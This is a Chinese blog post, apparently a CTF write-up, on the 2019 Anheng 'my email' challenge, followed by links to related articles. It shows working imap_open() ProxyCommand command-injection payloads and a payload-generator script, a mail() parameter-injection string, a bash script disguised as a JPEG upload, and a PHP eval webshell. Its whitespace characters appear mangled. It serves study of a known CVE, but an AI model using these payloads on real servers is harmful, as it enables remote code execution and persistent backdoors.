容器 php imap,从一道题看imap_open() RCE

最新推荐文章于 2024-08-08 07:46:05 发布
最新推荐文章于 2024-08-08 07:46:05 发布
阅读量260 收藏
点赞数
文章标签: 容器 php imap
本文介绍了通过邮箱授权功能结合PHP的imap_open函数进行远程命令执行(RCE)的攻击过程。作者首先发现了文件上传功能,并确定了文件路径可控点,然后利用邮箱授权功能,通过构造特定的imap_open参数,成功触发RCE,最终获取shell。过程中涉及了文件上传、邮箱授权、PHP函数漏洞利用等多个环节,展示了渗透测试中的思路转换和问题解决策略。
摘要由CSDN通过智能技术生成

171707?appinstall=0

前言

本题为2019安恒2月月赛的my email,从漏洞点发现到getshell还是有点意思的,以下是记录

信息搜集

拿到题目先看一遍功能,发现存在注册和登录功能

171707?appinstall=0

随便注册个账号,登入,得到信息

171707?appinstall=0

发现还有完善信息页面

171707?appinstall=0

看样子需要邮箱授权,我们随便测试一下

171707?appinstall=0

虽然提示我授权失败,但是来到主页,已经完善信息完成

171707?appinstall=0

发现增加功能:更换背景

http://101.71.29.5:10014/user/upload.php

发现是文件上传功能

我们测试一下,随意上传一个图片,查看一下源代码,发现

body{

background-image: url(./user/skysky.jpg);

background-size: 100%,100%;

width: 100%;

height: 100%;

}

得到上传路径与命名规则

$dir = './user/'.$username.'.jpg';

不难发现,最后保存路径存在可控点$username,我们进行二次注入探测

注册用户

skysky.php%00

登入后发现用户名变为

skysky.php

猜测应该注册处存在

addslashes($username)

那么应该很难使用$username去上传shell

攻击点思考

目前来看,情况僵硬,必须思考一下如何串联上述功能进行攻击了

既然不是直接upload+register进行getshell,那么势必需要用到邮件功能

不妨google一下

php+mail+rce

发现如下两个函数

PHP mail()

PHP imap_open()

为进一步确定方向和攻击点,我们看一下邮箱处需要的参数

171707?appinstall=0

我们再看上述3种和邮件有关的RCE

首先是

PHP mail()

我们知道其参数为

bool mail(

string $to,

string $subject,

string $message [,

string $additional_headers [,

string $additional_parameters ]]

)

这里的界面应该类似于写邮件,例如

171707?appinstall=0

而漏洞点即在于mail函数的第五个参数没有正确过滤,我们可以通过如下方式进行RCE

email=

-sky@skysec.top -OqueueDirectory=/ -Xskyskysky.php

title=

而这里我们的参数为

email,sign,server

功能为邮箱授权,感觉有些对不上号,我们再看看imap_open()

imap_open ( string $mailbox , string $username , string $password [, int $options = 0 [, int $n_retries = 0 [, array $params = NULL ]]] ) : resource

漏洞点在于第一个参数$mailbox

详细解析可见

https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb

imap_open()攻击测试

于是综上所述,我们将目光放在imap_open()上开始测试,我们可利用如下脚本生成payload

$payload = $argv[1];

$encoded_payload = base64_encode($payload);

$server = “any -o ProxyCommand=echot”.$encoded_payload.”|base64t-d|bash}”;

print(“payload: {$server}”.PHP_EOL);

例如

any -o ProxyCommand=echotbHM=|base64t-d|bash}

我们测试一下,由于imap_open是php的扩展模块,我们这里选择找个docker测试

随便搜一个

docker search imap

171707?appinstall=0

选择一个后pull

docker pull fedosov/docker-php-imap-composer

进入容器进行测试

docker run -itd fedosov/docker-php-imap-composer /bin/bash

docker attach id

先写一个带有imap_open的1.php

$payload = "echo skysky|tee /tmp/success";

$encoded_payload = base64_encode($payload);

$server = "any -o ProxyCommand=echot".$encoded_payload."|base64t-d|bash";

@imap_open('{'.$server.'}:143/imap}INBOX', '', '');

171707?appinstall=0

我们可以明显看到,运行前tmp目录为空目录,运行后,tmp目录生成了success文件,文件内容为我们指定的skysky

这样一来攻击点就清晰了:利用邮箱授权功能往./user/目录写入shell即可

注:为什么不执行命令呢?因为这里命令不回显……写shell的话要方便很多

题目攻击点测试

生成payload脚本为

$payload = "echo '<?php phpinfo();' > /var/www/html/user/sky.php";

$encoded_payload = base64_encode($payload);

$server = "any -o ProxyCommand=echot".$encoded_payload."|base64t-d|bash";

echo $server;

得到

any -o ProxyCommand=echotZWNobyAnPD9waHAgcGhwaW5mbygpOycgPiAvdmFyL3d3dy9odG1sL3VzZXIvc2t5LnBocA==|base64t-d|bash

我们测试一下

171707?appinstall=0

发现参数不被允许提醒,此时猜测是不是存在过滤,我们测试一下

171707?appinstall=0

171707?appinstall=0

171707?appinstall=0

发现

base64,|,

均被过滤,那么既然如此,该如何进行任意文件写入呢?

upload助攻

此时不难想起,之前还有一个上传功能,路径如下

$dir = './user/'.$username.'.jpg';

我们是已知文件名和路径的,那么能否在文件内容做文章,进行运用?

这里不难想到,可以直接使用bash filename

例如

171707?appinstall=0

那么我们只需要构造文件

echo 'echo "<?php phpinfo();"> skysky.php' > skysky.jpg

然后上传skysky.jpg,再利用imap_open() RCE即可

any -o ProxyCommand=bash skysky.jpg}

我们测试一下

171707?appinstall=0

171707?appinstall=0

171707?appinstall=0

发现成功执行phpinfo()

getflag

那么故技重施,即可getshell

echo 'echo "<?php eval($_REQUEST[sky]);"> skysky.php' > skysky.jpg

any -o ProxyCommand=bash skysky.jpg}

菜刀连上,即可getshell

171707?appinstall=0

171707?appinstall=0

后记

这道题目再一次说明了思路很重要,如果思路不明确,尝试注入,upload等则很容易被这道题目带入误区XD

weixin_39975529
关注
PHP imap 远程命令执行漏洞复现(CVE-2018-19518)
0xSec
12-27 1173
IMAP是在系统中执行任何命令的桥梁。Internet消息访问协议(IMAP)是电子邮件客户端用于通过TCP / IP连接从邮件服务器检索电子邮件的Internet标准协议。IMAP由Mark Crispin于1986年设计为远程邮箱协议,与广泛使用的POP(一种用于检索邮箱内容的协议)形成对比。目前,IMAP由RFC 3501定义规格。IMAP的设计目标是允许多个电子邮件客户端完全管理电子邮件收件箱。因此,客户端通常会在服务器上保留消息,直到用户明确删除它们为止。
php imap_open,PHP: imap_open - Manual
weixin_35214885的博客
03-23 280
Function to test most of the possible options of a connection:function imapConfig($options, $i=0, $till = array()) {if(sizeof($options)==$i)return $till;if(sizeof($till)==0)$till[] = '';$opt = $option...
php imap 库_php imap_open 实例教程
weixin_33983809的博客
03-09 318
php imap_open 实例教程imap连接服务器代码。//连接 IMAP 服务器链接,IMAP 的端口为 143。$mbox = imap_open("{localhost:143}INBOX","user_id","password");//连接POP3 服务器链接,POP3 的端口为 110。$mbox = imap_open("{localhost/pop3:110}INBOX","u...
Docker 邮件服务器快速入门及最佳实践
最新发布
gitblog_01167的博客
08-08 288
Docker 邮件服务器快速入门及最佳实践 docker-mailserver项目地址:https://gitcode.com/gh_mirrors/doc/docker-mailserver 1. 项目介绍 Docker-Mailserver 是一个生产级、全功能但简单的邮件服务器解决方案,它集成了 SMTP、IMAP、LDAP、反垃圾邮件和反病毒等功能。该项目不依赖任何SQL数据库,而是通过...
php imap_open效率低,PHP imap_open函数任意命令执行漏洞
weixin_39621075的博客
03-20 226
函数中的mailbox是执行命令参数的一部分,所以我们可以通过更改邮箱名来进行命令注入执行。IMAP服务器类型及SSH连接现在有两种基于Unix的IMAP服务器被人们广泛使用,一种为华盛顿大学开发的 imapd ,另一种为Cyrus开发的IMAP服务器。①Cyrus开发的IMAP服务器会将用户邮件存储到内置数据库中,只有通过IMAP协议才能访问Cyrus。因此,当使用Cyrus时,已安装IMAP的...
php imap open 授权码,|PHP imap_open Remote Code Execution... - 信息安全漏洞门户 VULHUB
weixin_36483061的博客
04-06 130
The imap_open function within PHP, if called without the /norsh flag, will attempt to preauthenticate an IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's...
PHP imap远程命令执行,CVE-2018-19518:PHP imap_open函数任意命令执行漏洞
weixin_34363294的博客
04-01 274
参考链接https://www.freebuf.com/vuls/192712.html漏洞描述PHPimap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前不正确地过滤邮箱名称。如果启用了rsh和ssh功能并且rsh命令是ssh命令的符号链接,则攻击者可以通过向目标系...
CVE-2018-19518复现 imap_open()
heySister
03-22 2942
CVE-2018-19518 前几天时候无聊翻了一下安恒杯2月的月赛目,看到有一道是用了跟imap_open()这个函数有关的webshell,去查了一下,发现是个CVE。emm…刚开始查到的是freebuf上面的一个文章,还有另外一个一模一样的,也不知道是谁抄谁,还是都是翻译的国外的
从ByteCTF到bypass_disable_function1
08-03
4. **imap_open**:另一个启动进程的函数,也可能被利用来绕过限制。 5. **Imagick库**:虽然较旧版本的Imagick可以直接执行命令,但即使在无法直接启动新进程的情况下,它在进行图片类型转换时也会启动外部程序,...
[极客大挑战 2019]RCE ME writeup + 无字母数字命令执行
ShenZ的博客
09-09 420
我以后再半夜开目我就是【】 知识点 利用取反运算符绕过无字母数字正则表达式 取反之后基本上都是不可见字符 yu22x大佬的php脚本: <?php fwrite(STDOUT,'[+]your function: '); $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); fwrite(STDOUT,'[+]your command: '); $command=str_replace(array("\r\n", "\
5.1. PHP
热门推荐
Sumarua的博客
07-05 1万+
内容索引:5.1. PHP5.1.1. 后门5.1.1.1. php.ini构成的后门5.1.1.2. .user.ini文件构成的PHP后门5.1.2. 反序列化5.1.2.1. PHP序列化实现5.1.2.2. PHP反序列化漏洞5.1.2.3. 相关CVE5.1.2.3.1. CVE-2016-71245.1.3. Disable Functions5.1.3.1. 机制实现5.1.3.2. Bypass5.1.4. Open Basedir5.1.4.1. 机制实现5.1.5. 安全相关配置5.1.
PHP使用imap_open读取QQ邮箱
liyichuanZhengzhou的博客
02-28 823
PHP使用imap_open读取QQ邮箱
php+连接imap,php – 无法使用imap_open()进行连接
weixin_29817791的博客
03-10 546
我正在尝试使用imap_open()连接并获取托管电子邮件地址的消息,但是它的抛出错误.$server = '{mail.booksnearby.in:143/imap/ssl/novalidate-cert}INBOX';$imap_connection = imap_open($server, $login, $password);$mailboxinfo = imap_mailboxmsgi...
php imap_open效率低,抑制虚假PHP imap_open()注意:不安全的服务器广告AUTH = PLAIN
weixin_29790897的博客
03-20 140
您可以使用此方法抑制通知,同时获取所有警告和错误:error_reporting(E_ALL & ~E_NOTICE & ~E_USER_NOTICE);位级错误报告标志是:Error Bit Purpose##############################################################################...
php imap无法使用,phpimap_open()表示“无效的远程规范”并且无法连接
weixin_39774682的博客
03-22 715
当我尝试使用imap_open时,我收到以下错误:Warning: imap_open() [function.imap-open]: Couldn't open stream {mail.domain.com:110/pop3/novalidate-cert/} in /path/to/mailbox.php on line 5Can't open mailbox {mail.domain.co...
imap_open() 无法连接问分析处理
qq_42735623的博客
10-09 4840
Flag Description /service=service mailbox access service, default is "imap" /user=user remote user name for login on the server /authuser=user remote authentication user; if sp...
php imap_open效率低,求救,为什么 imap 连接这么慢
weixin_31461519的博客
03-20 570
我正在使用 php 进行 webmail 开发,但是一直有一个问,使用 imap_open 连接的时候,发现在 windows 上了连接 qq 很慢,单纯一个 imap_open 连接就要 5-6 秒,这里是代码$a = time();$user = "my username";$password = "my password";$mbox = @imap_open('{imap.qq.com:...
[Vulhub] PHP imap远程命令执行漏洞(CVE-2018-19518)
weixin_45605352的博客
05-08 1758
0x01 预备知识 PHPimap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。 php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian / ubuntu中用来使用ssh来代替rsh的功能(即在debian系列系统中,执行rsh命令)实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 如果启用了
php imap读取邮件功能
songhui6的专栏
07-18 8852
在网上找了很多读取邮件的类都不能用,找了一个11年的后改的,现在分享给大家 Email.php  代码如下: /**  * NOTICE OF LICENSE  *  * THIS SOURCE FILE IS PART OF jbxue'S PRIVATE PROJECT.  *  * DO NOT USE THIS FILE IN OTHER PLACE.
攻防世界php_rce
08-26
攻防世界中的php_rce是指一种利用PHP解释器的远程代码执行漏洞进行攻击和防御的技术。这种漏洞可以允许攻击者将恶意的PHP代码注入到服务器上,并执行任意命令。引用中的payload是构造了一个用于执行"ls /flag"命令的payload,而引用中的payload则是用于执行"cat /flag"命令的。这些payload利用了PHP解释器中的函数调用漏洞,通过构造特定的函数调用参数来执行系统命令。所以,这些payload可以用于远程执行系统命令,如列出/flag目录下的文件或显示/flag文件的内容。请注意,这些payload仅用于演示和研究目的,并且在现实环境中使用它们是违法的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值